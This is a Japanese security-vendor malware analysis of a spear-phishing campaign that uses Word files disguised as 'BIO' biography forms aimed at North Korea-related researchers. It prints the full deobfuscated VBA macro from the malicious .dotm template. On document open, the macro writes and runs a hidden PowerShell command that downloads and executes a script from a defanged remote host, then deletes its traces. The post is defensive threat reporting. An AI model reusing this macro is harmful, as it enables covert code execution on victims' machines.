ASEC 分析チームは、先月から継続的に Word ドキュメントを利用した APT 攻撃について掲載してきた。最近、このタイプのマルウェアが「BIO 様式」という名前で頻繁に配布されていることを確認した。これまでの Word ドキュメントの拡散履歴を見ると、当該ファイルも対北朝鮮関連の教授や研究所長をターゲットにして学術伝記(Biography)の様式を装って配布されているものと推定される。
最近拡散が確認されたファイルも Word ファイル内部の External リンクを通して不正なマクロが含まれた dotm ファイルを実行している。以下は8月2日に拡散が確認された「BIO 양식(XX 소장님).docx (翻訳:BIO 様式(XX 所長).docx)」ファイルに含まれていた External リンクである。
ダウンロードされた BIO.dotm ファイルには不正なマクロが含まれている。マクロコードは以前と同じ方式で難読化されており、難読化を解除すると以下のようなコードが確認できる。
Private Sub Document_Open()
Set djfeihfidkasljf = CreateObject("Shell.Application")
dfgdfjiejfjdshaj = "powershell.exe"
dfjsdjailfksf = "C:\windows\temp\Ahnlab.log"
skdjfksjkfjkdsfj = "$fjeils={(New-Object Net.WebClient).Dring('hxxp://zenma.getenjoyment.net/ja/ng.txt')};[string]$aiwdf=$fjeils;$ndask=$aiwdf.insert(28,'ownloadst');$bmcns=iex $ndask;iex $bmcns"
Open Trim(dfjsdjailfksf) For Output As #2
Print #2, skdjfksjkfjkdsfj
Close #2
dfisafkdjaflkjs = "$a='C:\windows\temp\ahnlab.log';$d=[IO.File]::ReadAllText($a);$e=iex $d;iex $e"
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfisafkdjaflkjs, "", "open", 0
Dim SngSec As Single
SngSec = Timer + 5
Do While Timer < SngSec
DoEvents
Loop
Kill (dfjsdjailfksf)
End Sub従来は特定の URL で直接ダウンロードを試みる Powershellコマンドを実行していたが、このマクロコードはダウンロードコマンドを「Ahnlab.log」ファイルに作成した後、生成したファイルを実行させる方式に変化している。
Word ファイルを開くと実行される Powershellコマンドは、以下のように変化した。
最終的に実行される hxxp://zenma.getenjoyment.net/ja/ng.txt に存在するスクリプトは、以前と同じ機能を実行する。
特定のユーザーをターゲットとして External リンクを利用した Word ドキュメントが未だに拡散しており、ユーザーは特に注意が必要である。
V3 では、上記で紹介したファイルに対して以下のように検知している。
[ファイル検知]
[関連ページ]
https://asec.ahnlab.com/jp/25545/
Categories:マルウェアの情報